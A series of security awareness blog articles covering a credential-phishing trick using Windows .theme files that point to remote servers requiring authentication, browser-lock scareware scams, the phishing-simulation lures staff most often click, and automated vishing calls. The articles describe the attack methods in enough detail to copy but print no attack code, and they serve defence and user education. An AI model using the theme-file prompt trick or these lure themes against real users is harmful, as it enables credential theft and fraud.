Did you know that we do a show on Facebook every week in our Naked Security Live video series?
We usually discuss one of the big security concerns of the week – from data breaches and corporate hacks to vulnerabilities and scare stories – in a way that not only explains what happened but also offers useful tips about how to stay safe.
We’d love you to join in live if you can – just keep an eye on the @NakedSecurity Twitter feed or check our Facebook page on Fridays to find out the time.
It’s usually about 18:00 UK time, which is early afternoon/late morning on the East/West coast of North America.
Note that you don’t need a Facebook account to watch our live streams, although you will need to login if you want to ask questions or post comments.
For those of you who [a] don’t use Facebook, [b] had buffering problems while we were live, [c] would like subtitles, or [d] simply want to catch up later, we also upload the recorded videos to our YouTube channel, where you can view them at your leisure.
Our cybersecurity antennae always start vibrating when we see warnings about attacks that involve a new type of file.
We’re sure you have the same sort of reaction.
After all, if a file type that you’ve treated for years as mostly harmless suddenly turns out to be possibly very dangerous, you’re faced with a double dilemma:
How long will it take to unlearn an ingrained habit of trusting those files?
How long will the crooks take to start abusing this new-found knowledge?
We’re all aware of the risks posed by unknown EXE files, for example, because EXE is the extension for native Windows programs – even the operating system itself is implemented as a collection of EXEs.
Most of us also know to be wary of DLLs, which are actually just a special type of EXE file with a different extension to denote that they’re usually used in combination with other programs, rather than loaded on their own.
We’ve learned to be wary of DOCs and DOCXs and all the other Office filetypes, too, because they can include embedded programs called macros.
We’re also aware of a range of risky script files such as JS (for JavaScript), VBS (Visual Basic Script), PS1 (Powershell) and many others that are plain old text files to the untrained eye, but are treated as a series of system commands when processed by Windows itself.
We’ve even taught ourelves to be wary of the extent to which Windows itself misleads us because of its default approach to filenames – as in the case of the files alert and alert.txt below, which go out of their way to convince us they’re just innocent text:
Forget what they look like: those old-school icons on the left that give the impression of being medieval scrolls don’t denote plain old written text at all.
Ironically, however, the icon in the middle that looks like a crisply modern digital document, and that goes with a file that’s actually called document, really is a text file.
By default, Windows suppresses filename extensions, which are the all-important characters that follow the last dot in a filename, such as the .docx at the end of the Word file TaxReturn.docx or the .exe at the end of the program Notepad.exe.
Annoyingly, Windows itself very often uses extensions to decide what to do when you click on a file – for example, whether to view it harmlessly or to execute it riskily.
Yet the operating system rather patronisingly assumes that you don’t need to bother yourself with those pesky extra letters at the end of your filenames.
Indeed, if we turn on the View > File name extensions option (highly recomended!) in File Explorer, you’ll see the dangerous truth behind those “scroll icon” files that looked above as though they were called alert and alert.txt:
In real life, those are .js files, and if you double click on them thinking you are about to open them up to view their contents, then you will get an unpleasant surprise.
Windows will automatically run them as all-powerful JavaScript programs – not in the comparative safety of your web browser, but directly on your computer as local apps.
(Apparently that icon doesn’t represent a scroll. It’s meant to be a script. Who knew?)
Enter the Theme file
At right hand side of the images above, you’ll see files with the extension .theme, denoted by icons that depict what look like a series of background images.
We’re willing to bet that if you’ve ever downloaded and used .theme files (or .themepack files, which are just a collection of .theme files bundled together), you’ve not worried too much about security.
Very loosely speaking, Windows Themes are just INI-style text files that specify various settings for background colours, wallpapers, and visual effects.
Here’s a simple example, a copy of the file justatest.theme depicted above:
(No, we don’t know what the text MTSM=DABJDKT in the last line means or what it’s for; we just know that Microsoft insists that you have it in the file and says, “You do not have a choice of values for this parameter.”)
Admittedly, just loading untrusted image files, such as the Wallpaper file specified above, can theoretically be dangerous.
That’s assuming there’s an unpatched vulnerability in one of your apps, or in Windows itself, that can be reliably exploited to trick your computer into running a fragment of executable code when a deliberately crafted image file is opened.
In practice, however, that type of vulnerability is rare these days – those that are found are either quickly patched or jealously guarded, and can usually be triggered by delivering a booby-trapped image directly to your computer in a web page or an email rather than relying on a Theme file to reference them indirectly.
The danger posed by booby-trapped Themes is therefore both small and manageable – giving .theme files a justifiable assessment of mostly harmless.
Despite their generally low direct risk, .theme files nevertheless received a public airing in in the notorious “Vault 7” data dump back in 2017, when WikiLeaks exposed a massive trove of confidential documents allegedly stolen from the CIA. Vault 7 included a knowledgebase article, supposedly from the CIA’s Information Operations Centre, remarking that Themes might be handy as a way of amplifying the effect of an existing exploit by allowing multiple variants of the exploit to be delivered in one go: “[I]n the cases where your execution vector uses icon rendering/file previews to exploit (link files, font files), a theme file can allow you to point to up to three other files and render them from one.”
Harmful after all
But some recent digging by a security researcher going by @bohops revealed that Themes are open to abuse by cybercrimals after all – albeit in an indirect way to phish for passwords rather than directly to implant malware on your computer.
[Credential Harvesting Trick] Using a Windows .theme file, the Wallpaper key can be configured to point to a remote auth-required http/s resource. When a user activates the theme file (e.g. opened from a link/attachment), a Windows cred prompt is displayed to the user 1/4 pic.twitter.com/rgR3a9KP6Q
Traditionally, .theme files are used simply as a way of triggering the automatic installation and rendering of one or more local files – indeed, that’s how the CIA envisaged using them for activating exploits:
In the animation above, you can see how double-clicking a .theme file launches the Windows Settings app, automatically navigates to the Preferences > Themes section, and then opens, copies, selects and renders the new wallpaper file justatest.png onto our desktop.
What if?
So far, things haven’t been very worrying.
Bohops, however, put his “What if?” cybersecurity research hat on, and wondered what might happen if he used a Theme file to reference images out on the internet, using web URLs instead of regular filenames.
Like this, taken from the file called justahack.theme seen above:
All we’ve changed is the DisplayName of the Theme itself and the “filename” specified on the Wallpaper line.
In our real-world tests, we used a genuine domain name pointing at a test server of our own, fitted out with a genuine HTTPS certificate from Let’s Encrypt. Here, however, we have redacted the site name and replaced it with a special use domain name, as detailed in RFC 2606 and RFC 6761. We urge you to follow these RFCs in your own cybersecurity articles and documentation. By sticking to IP numbers and domain names that are realistic but will never be allocated in real life, you avoid the risk that someone might blindly copy and paste your examples into one of their own tests and subject some innocent third party to an inadvertent, annoying and possibly even dangerous attack.
Bohops realised that the Settings app will honour the URL in the Theme file, automatically connecting to it without showing you any sort of browser window, and attempting to fetch the file that’s referenced.
That’s slightly more worrying that reading a file that’s already on your computer, but probably still not enough to reclassify Themes as much worse than mostly harmless.
One step further
Bohops was able to go one step further, however.
The trick he figured out was simple but surprisingly effective: point the Theme file at a web server you control, configure your website to require authentication, and see if the Windows computer will supply you with a password.
We did that by mocking up a web server of our own in a few lines of Lua so we could track how the Settings app behaved.
In our server script, we collected the HTTP headers and used a basic HTTP 401 response (“must authenticate”) when the Settings app first came calling.
Here, we check that the web request doesn’t yet contain an Authorization header, which is how a web client denotes that it has already gone through the logon process:
Note that with HTTP Basic authentication, we get to choose the message that we’d like the the other end to display when it prompts for your credentials.
The client responds to a 401 Must authenticate reply by collecting your username and password somehow, combining them into a text string with a colon (:) between, encoding them using Base64, and including the result in its next attempt to fetch the file.
Here’s what happened:
Notice how the credential popup is tagged as belonging to the Windows Settings app rather than your browser, giving it a credibility it doesn’t really deserve.
You should spot the subterfuge, of course, because the password dialog explicitly states the website name it’s connecting to, and makes it clear that it’s the website that’s asking for the password and providing the explanatory text, not Windows itself:
Password dialog when file is specified via an HTTPS link.
The Settings app will even connect to a non-HTTPS site to fetch Theme files (we tried it to see), though it will warn you not to put in your password due to the lack of encryption:
Password dialog if an unencrypted HTTP link is used for the file.
(If you try to use HTTPS but don’t supply a valid web certificate that Windows trusts, the Settings app will give up silently.)
Does it get worse?
As Bohops and others have pointed out, you can use a Windows UNC path instead of a website name in a Theme file, which tells Windows to use its file-based networking instead of a regular HTTP connection to retrieve the file.
UNC paths are well-known to users of Windows networking, and usually rely on Windows computer names and network share names, such as \\YOURPC\C$\Windows\System32\NOTEPAD.EXE
But you can put an internet domain name or an IP number into a Windows UNC name, and Windows will automatically trigger its built-in WebDAV client to fetch the file, instead of using its own networking protocols.
WebDAV is short for Web Distributed Authoring and Versioning and it’s a modified flavour of HTTP used to support network-based data stores that support files and directories like a regular local or networked filing system such as NTFS or CIFS.
We were able to get Settings to use WebDAV over TLS by specifying our wallpaper like this:
In theory, getting Windows to connect to a WebDAV resource that requires authentication ought to provoke a Windows-style network login popup, using Windows NTLM (native) authentication rather than the less convincing HTTP-style credential popup that we saw above.
This would make it more likely that a rogue Theme file could trick you into putting in your regular Windows username and password, although NTLM authentication uses a challenge-response hashing system that means the plaintext of your password would not be revealed as it was above when we forced HTTP Basic authentication.
An attacker using the UNC approach would therefore have to collect a hash of your password and crack it – somewhere between very difficult and impossible if you have chosen wisely.
Nevertheless, cybercriminals might be able to recover a poorly-chosen password if they have plenty of computer power to throw at the cracking task (which can be done offline).
We got nowhere
We weren’t able to get anywhere using UNC filenames, however.
We were able to get Windows to make a secure WebDAV connection to our mocked-up WebDAV server, where could monitor the requests from the Settings app.
Once again, we used a stripped down Lua server, and this time we recorded this transcript:
The session opens with an OPTIONS command, where the client verifies that it’s talking to a WebDAV server rather than to an HTTP server that lacks the WebDAV extensions.
The command PROPFIND that follows is essentially the WebDAV equivalent of the Windows function pair FindFirstFile()/FindNextFile(),and shows us which file Windows wants to download.
We replied to Windows and requested the use of HTTP NTLM authentication
Other researchers who have looked into WebDAV behaviour in the past have reported that the WebDAV client reacts to HTTP NTLM authentication demands by repeating its original unauthenticated request several times, before finally conceding defeat and going through the NTLM challenge-response process.
This ultimately reveals a hashed version of your Windows password that can be attacked, and possibly cracked if the attacker is lucky.
However, in the tests where we double-clicked on Theme files that specified a remote UNC resource, we were not able to provoke Settings into attempting authentication at all, let alone revealing a Windows password hash.
After 19 attempts to locate the nowwithwebdav.png file without authentication, the Settings app gave up every time.
What we can’t tell you is whether that’s down to a deliberate security restriction in the relevant part of the Settings app, to a default Windows NTLM setting that’s specific to the operating system version we were using (Windows 10 Enterprise 19041.450), to a limitation in our fake WebDAV server, or to something else entirely.
If you get further than we did with UNC paths, let us know in the comments below!
What to do?
Fortunately, this isn’t a critical security problem and should be easy to avoid, even if the crooks decided to start trying it out in earnest.
Here are our six tips to stay safe:
Read password prompts carefully. We agree with @bohops that the phishing popup we demonstrated above is more believable than seeing the same sort of login prompt directly in your browser, not least because the password box is convincingly headlined Settings. Nevertheless, the dialog does make it clear that the password request comes from a remote website, not from Windows, and that the login message comes from the site too, not from the operating system.
Avoid opening files you aren’t familiar with. It’s harder to spot that something unusual is going on if you aren’t familiar with what is usual.
Turn on the option to show file extensions. In File Explorer, click on the View item in the menu bar and then turn on the option File name extensions. If the Explorer window is narrow you may need to open the Show/hide tab first. Windows uses file extensions to decide how to handle files, and you should too, because the crooks love to use names like safe.txt.js or harmless.document.exe to throw you off the scent.
Turning on the Windows option to show file extensions.
Use a cybersecurity product that includes outbound web filtering. Sophos products, for example, don’t just scan incoming files for malware. After all, phishing attacks don’t rely on getting bad stuff into your network on purpose – they rely on you inadvertently letting good stuff out by mistake. Web filtering can keep you clear of rogue sites in the first place to keep you even further out of harm’s way.
Pick proper passwords. No, a complex password wouldn’t protect you against the HTTP Basic authentication trick shown above if you entered your own password anyway. But proper password choice will protect you if all an attacker can acquire is a strongly hashed version of your password, because the only way to recover the password is to try a lengthy list of likely password in the hope of finding one that matches the hash. Don’t be the first to fall!
Report unusual or suspicious content promptly to your security team. We’re betting that you’ve never, or at most very rarely, had anyone trying to foist a Theme file on you before. If an outsider tries to talk you into clicking, opening or approving something that you didn’t expect, don’t need and that you can’t see the point of… ask yourself, “Why would anyone do that?”
Internet scammers are always looking for a better way to separate unwitting device users from their money. And as with all other endeavors, they’ve learned that it pays to advertise.
At SophosLabs we recently researched a collection of scams that exploit web advertising networks to pop up fake system alerts on both computers and mobile devices. The goal: to frighten people into paying for a solution—to a problem they don’t even have.
It’s not exactly a new trick. “Scareware” pop-ups have been used for years to prompt people into downloading fake virus protection and other malicious software, including ransomware.
But the latest variations find other ways to cash in on fake alerts: using them as the entry point to technical support scams or prompting their victims to purchase fraudulent apps or “fleeceware” off a mobile app store.
Technical support scam ad
Browser developers have done a lot to limit the damage that can be done by malicious pop-up sites, including recent fixes by Mozilla that attempt to limit the ability of malicious web pages to slow down and lock up the Firefox web browser.
But even if the scammers don’t lock up your web browser, they can make it appear that something has gone terribly wrong—and that you need to do something immediately about it.
Scammers pressure victims into taking action
That’s where the potential damage begins, with victims allowing the fraudsters to gain access to their device, and to install and extract payment for totally unneeded (and potentially harmful) software. These scams reap tens of millions of dollars from their victims each year.
A whole industry has sprung up around fake alert scams, including scam kit toolkit developers and commercial platforms for managing malicious advertising campaigns.
That industry is diversifying its customer base as well. We’ve recently spotted fake alert campaigns targeting Japanese, German, and French-speaking Windows and macOS users, and have observed efforts by tech support scammers to find people who speak those languages to participate in their scams.
What to do?
Fortunately, these scams are usually pretty easy to spot if examined critically. Like phishing messages, they often contain messages with strange phrasing, capitalization, and grammar or spelling mistakes.
Look out for poor grammar and odd phrasing
Sometimes they include a countdown, in order to make you more nervous—after which they suggest your phone or computer will be damaged.
Scammers create a sense of urgency with wording and countdowns
And some technical support scams will play computer-generated voice messages urging you to take action.
But all of these scams have one very specific thing in common—they go away when you close your browser.
While mobile fake alerts and similar pages on desktop browsers can be easily closed, “browser lock” support scam pages often use scripts that make it difficult or impossible to close the web browser normally or navigate away from the page, including:
Forcing the browser window to full screen size.
Hiding or camouflaging the mouse cursor.
Launching never-ending file downloads.
Popping up log-in boxes that request a username and password.
Attempting to capture keystrokes to prevent navigation away from the page with keyboard shortcuts.
Using Task Manager (on Windows) or Force Quit (on macOS) may be the only way to escape some of these pages, short of a reboot—that and not allowing the browser to restore pages from the last session when re-launching.
However, the best way to prevent most of these attacks is to cut off the ad networks that they rely on.
Privacy tools such as the Electronic Frontier Foundation’s Privacy Badger browser add-on block trackers used by less reputable ad networks. Reputation-tracking services can help as well, blocking domains known to host or deliver malicious ads.
As with phishing, education is also key. If you’re on your guard for these scams you’re less likely to fall for them.
Sophos Phish Threat, in its own words, is a phishing attack simulator – it lets your IT department send realistic-looking fake phishes to your own staff so that if they do slip up, and click through…
…it’s not the crooks on the other end.
The crooks are testing you all the time, so you might as well test yourself and get one step ahead.
(Don’t panic – this isn’t a product infomercial, just some intriguing statistics that have emerged from users of the product so far this year.)
You can knit your own scam templates to construct your own fake phishes, but the product includes an extensive collection of customisable templates of its own that we update regularly.
The idea is to to track the look and feel of real-world scams of all types, all the way from Scary Warnings of Imminent Doom to low-key messages saying little more than Please see the attached file.
History teaches us that email tricks can work surprisingly well with no text in the message body at all. One of the most prevalent email viruses of all time was HAPPY99, also known as Ska, which came out just over 20 years ago at the start of 1999. The email consisted only of an attachment – there was no subject line or message, so the only visible text in the email was the name of the attachment, HAPPY99.EXE. If you opened it, a New Year’s fireworks display appeared, though the animation was cover for the virus infecting your computer and then spreading to everyone you emailed thereafter. Ironically, the lack of any explanatory text at all meant that the email was much less suspicious than if the subject line had contained words in a language the recipient wouldn’t have expected. HAPPY99 as a filename all on its own had a timely and global appeal that almost certainly tricked millions more people into clicking it than if it had included any sort of marketing pitch.
Searching for the best worst
Well, the Phish Threat team asked themselves, “Which phishing templates give the best, or perhaps more accurately, the worst results?”
Are business email users more likely to fall for sticks or carrots? For threats or free offers? For explicit instructions or helpful suggestions? For “you must” or “you might like”?
The answers covered a broad range of phishing themes, but had a common thread: not one of them was a threat.
Most of them dealt with issues that were mundane and undramatic, while at the same time apparently being interesting, important, or both.
Nothing on this list was truly urgent or terrifying, and they all sounded likely and uncomplicated enough to be worth getting out of the way quickly.
The Top (or Bottom) Ten
Rules of conduct. This purported to be a letter from HR outlining the company’s new Rules of Conduct. With global interest in increasing worksplace diversity and reducing harrassment, many companies are revising their employment guidelines. Most staff know that they’re supposed to read new guidelines, and that the HR team is obliged to chase them until they do, so clicking through here feels like a task you might as well get out of the way.
Delayed year-end tax summary. This notified staff that their tax docmentation wouldn’t arrive when they expected. Whether your country calls it a W-2, a P60, an IRP 5 or a Payment Summary, it’s one of those “necessary evils” that staff know they need, so they might as well find out how long the delay will be.
Scheduled server maintenance. We were surprised that this was #3, because we rather cynically assumed that most people would be inclined to ignore IT messages of this sort, on the grounds that they couldn’t do anything about them anyway. In retrospect, however, now that so many people are working from home, we suspect that people like to know when outages are likely so they can schedule their own lives around them.
Task assigned to you. In this message, the Phish Threat user gets to pick a project schedulding system that their own company uses (e.g. JIRA, Asana), so that the email doesn’t stand out as obviously bogus. Although that makes this a semi-targeted phish, you should assume that the business tools used in your company are widely known and easy for crooks to figure out, perhaps even automatically.
New email system test. Who doesn’t want to be helpful, if all it takes is one quick click?
Vacation policy update. Thanks to coronavirus lockdown and quarantine, booking and taking vaction leave is a tricky issue these days. Many companies are adapting their vacation policies accordingly – and who wants to risk missing out on time off?
Car lights on. In this message, the building manager was apparently being cheerily helpful by reporting a car with its lights turned on. In real life, you might be suspicious that they posted a picture instead of just typing in the vehicle tag – but it occurred to us that many states and provinces in North America don’t supply front plates any more, so a photo taken from the front of the vehicle probably wouldn’t show the tag (registration number) anyway.
Courier service failed delivery. This is a tried and tested trick that crooks have used for years. It’s especially believable these days thanks to the surge in home deliveries due to coronavirus. In fact, you may be expecting a delivery yourself right now – and in most cases it’s the vendor who decides which courier company to use, so you might not know who is doing the drop.
Secure document. This purported to be a “secured document” from the HR team, giving a plausible reason for making you take an unusual route to view it. This trick is widely used by phishing crooks as reason to convince you to enter passwords where you wouldn’t usually have to, or to adjust the security settings on your computer – ostensibly for the sake of improving security, but in reality to reduce it.
Social Media Message. This one was a simulated LinkedIn notification promising that “You have unread messages from Joseph”. LinkedIn seems to be enjoying a surge in popularity right now, which is not surprising considering how many people have lost their jobs or had their working hours cut because of the coronvirus downturn. It’s tempting to click through, for fear of missing out, and scammers are happy to capitalise on that.
What to do?
Think before you click. Even if the message looks innocent at first sight, are there any scam giveaways that are obvious if you take the time to check? Examples include: spelling mistakes you doubt the sender would make, terminology that isn’t how your company would say it, software tools your company doesn’t use, and behaviour such as altering security settings you have explicitly been warned not to change.
Check with the sender if you aren’t sure. But never check by replying to the email to ask if it’s genuine – you will get the answer “Yes” either way, because a legitimate sender would tell the truth but a crook would lie. Use a corporate directory accessible via trustworthy means to find a way to get in touch with a colleague you think has been impersonated.
Take a careful look at links before you click. Many phishing emails contain text and images that are error-free. But the crooks often have to rely on temporary cloud servers or hacked websites to host their phishing web pages, and the subterfuge often shows up in the domain name they want you to visit. Don’t be tricked because a server name looks “close enough” – crooks often register near-miss names such as yourcompanny, yourc0mpany (zero for the letter O) or yourcompany-site, using misspellings, similar-looking characters or added text.
Report suspicious emails to your security team. Get in the habit of doing this every time, even though it feels like a thankless task. Phishing crooks don’t send their emails just to one person at a time, so if you’re the first in the company to spot a new scam, an early warning will let your IT department warn everyone else who might have received it too.
By the way, if you’re in the security team and you don’t have a quick and easy way for your staff to report potential cybersecurity problems such as suspicious phone calls or dodgy emails, why not set up an easy-to-remember internal email address today, and get used to monitoring it?
It doesn’t take much encouragement to turn your entire workforce into the eyes and ears of the security team.
After all, when it comes to cybersecurity, an injury to one really is is an injury to all.
And how does it differ from phishing, something that most of us see far to much of?
The V in vishing stands for voice, and it’s a way of referring to scams that arrive by telephone in the form of voice calls, rather than as electronic messages.
Of course, many of us use voicemail systems that automatically answer and record messages when we aren’t able or willing to take a call in person, and many modern voicemail systems can be programmed to package up their recordings and deliver them as email attachments or as web links.
So the boundary between voice calls and electronic messages is rather blurred these days.
Nevertheless, many of still routinely pick up calls in person when we can – especially those of us who run a business, or who have family members we’re supporting through coronavirus lockdown or who aren’t well and might need urgent help.
We know several people who keep a landline especially as a contact point for family and friends.
They give out their landline number sparingly on what you might call a “need-to-know” basis, and use their mobile number – which is comparatively easy to change if needed, and easy to monitor and filter using a suitable app – for day-to-day purposes where giving out a working number can’t easily be avoided.
As you can imagine, however, the crooks only need to uncover your phone number once, perhaps via a data breach, and they can call it forever, especially if it’s a landline that you’re keeping because people who are important to you know it and rely on it.
Semi-targeted phone attacks
The crooks don’t even need to know any details behind your number to abuse it, in the same way that they don’t need to know your full name, where you live or what you do for a living in order to spam and scam you by email.
Obviously, the more an attacker knows about you, the more they can tailor their scams – or target them, in the military jargon that’s become trendy in the cybersecurity field.
Even being able to say “Hello Your Real Name” instead of “Dear Customer” makes a message more believable, and including personal information can make a spam or scam more convincing still.
That’s why porn scammers, also known as sextortionists, who email to demand money for “suppressing” a prurient video of you (one that they don’t have because it doesn’t exist), include personal data in the message, such as your phone number or an old password.
They do this as a way of “proving” that they really did hack your computer, even though they almost certainly acquired the data from an ancient data breach.
Vishing scams, however, just like smishing scams (phishing via SMS), can sound realistic even if the crooks can do no better than guess at your online life.
Unlike emails, SMSes and voice messages – especially automated ones that use a synthetic voice and don’t need to be interactive – can get away with being stripped to the basics.
SMSes are limited to 160 characters, while voice messages are limited by the fact that about 30 seconds is the longest that people are likely to listen with any sort of attention to a recorded warning – and that is enough time for just 60 words dictated with any clarity.
And by picking a popular and widely-used service as the theme of the scam – such as a well-known global home delivery brand, or email provider, or payment processor, the crooks have a good chance of guessing correctly for a significant minoirity, perhaps even an absolute majority, of recipients.
Vishing at home
60 words or so turns out to be more than enough to create a believable bait, especially when it’s a voice message that lacks the permanence of an email or an SMS.
And, in the UK at least, there seems to have been a recent surge in home delivery vishing campaigns.
We can’t tell whether this is just one group of crooks who are focusing on both vishing and the UK at the moment, or if it’s a broader global trend, but we (and people we know in the UK) are experiencing unwanted vishing calls at a much greater rate than any time in the past few years.
We’re not talking about interactive scams here, like those fake technical support calls where a crook with the gift of the gab call up out of the blue to pester, lie, cheats and frighten you about made-up malware on your computer in order to talk you into buying a fraudulent “cleanup service” that you didn’t need in the first place.
This new wave of calls are automated, using voice synthesis to “speak” with diction and an accent that is nearly, but not quite, as good as Siri, and they seem to follow a shorter and much crisper script than similar scams we’re aware of from he past couple of years.
Most older recordings we’ve heard have English text with poor wording and grammar that was either synthetically generated by poor-quality voice software or dictated by someone reading inexpertly from a printed script.
But this latest batch sounds much more believable, following scripts roughly along these lines (we don’t have recordings, so these are paraphrased from various Naked Security readers’ memory):
Your Amazon order for [several hundred pounds ending in -99] has now been processed. Your [phone product] will soon be dispatched and you should receive it in [a small number] of days. For further information or to cancel the order, press 1 now to speak to an operator.
Your Amazon Prime subscription will auto-renew. Your card will be billed for [several tens of pounds ending in -.99]. To cancel your subscription or to discuss this renewal, press 1 now.
One of our readers pressed 1 to see what would happen (we don’t recommend doing this, simply because the only thing you can be certain of is that you will be talking to an out-and-out criminal who knows your phone number and perhaps even where you live).
As you can probably imagine, the reader ended up talking to a real human in what sounded like a boiler-room call centre, just as you would if you were called directly by one of those technical support scammers claiming to be from Microsoft or your internet provider.
Why it works
The sad things about this sort of scam are:
The crooks use internet telephony (VoiP), so they pay close to zero for the calls.
The calls emerge into the landline or mobile network inside your country, so they often show up with a believable local number.
Synthetic voice calls are widely used by legitimate businesses these days, so they are no longer a telltale sign that the call is suspicious.
The call centre crooks only ever deal with “already active” callers who have pressed 1, making their scamming process more efficient.
The calls are hard to avoid, especially if they arrive on a line that you keep primarily for family emergencies.
The incoming call numbers change all the time, so that adding them to your phone’s blocklist, if it has one, doesn’t help much.
Reporting them feels like a waste of time, because the callers are almost certainly outside the jurisdiction of your own telecommunications regulator.
What to do?
Unfortunately, this is one of those cybercrimes for which we don’t have a good set of “this will fix the problem” answers.
Some people find that running all their calls through voicemail acts as a filter and stops the calls being intrusive, but if it’s a landline you rely on for the timely report of family emergencies then you still need to let the phone ring aloud to alert you to the call, and you may not know what incoming numbers to expect anyway.
(If your emergencies include possible calls from healthcare workers or hospitals, you will often find that those people and organisations withold their numbers to cut down on nuisance replies or to protect the privacy of the workers involved.)
Reporting unwanted phone calls can be somewhere between impossible, if the number is witheld and very hard, depending on your country.
For example, in the UK there is – rather annoyingly – a different procedure for reporting scam calls, which is where someone calls you up and talks a load of lies or unwanted junk into your ear, and abandoned or silent calls (“hangups”), which is where the caller cuts the connection before a human comes on the line at their end.
Calls where the other end doesn’t say a word, either through an unnerving silence or by using an automated voice only, are understandably considered creepier and therefore criminally more serious than viva voce, in-your-ear dishonesty, and are therefore regulated differently.
In the former case, in our experience trying to report rogue callers in the UK in the past, you can make your report anonymously; in the latter, the process is more complicated and you have to say who you are, presumably because scam calls are a regulatory issue but abandoned and silent calls may be a criminal offence.
So, if you can recover the caller’s number and are willing to report it, we encourage you do to so.
But we accept that this may be too much effort, or require too much personal involvement, for some people in some countries, so we’re not going any further than encouragement here.
All we can advise as a matter of routine is the rythmic and easily-rememered ditty that the Australian cybersecurity industry came up with many years ago as a way of thinking about how you deal with spammers and online charlatans: Don’t try. Don’t buy. Don’t reply.
Don’t let yourself get sucked, surprised or seduced into taking any direct action – not even if you think it might be amusing to see who’s at the other end – after all, you’re talking to a crook, so the best thing that can happen to you is nothing.
If you are worried about a fraudulent transaction, whether it’s via Amazon or any other coronavirus-friendly online merchant, login to your account yourself, or call the company’s helpine yourself, using contact information you already have.
Never rely on information provided inside an email, or read out to you in a call, as a way of deciding whether to believe the email or the call.
After all, if the call or email is true, the reply you will receive will be truthful and will say, “It’s true.”
But if the call or email is false, the reply you will receive will be a lie, and will also say, “It’s true”!
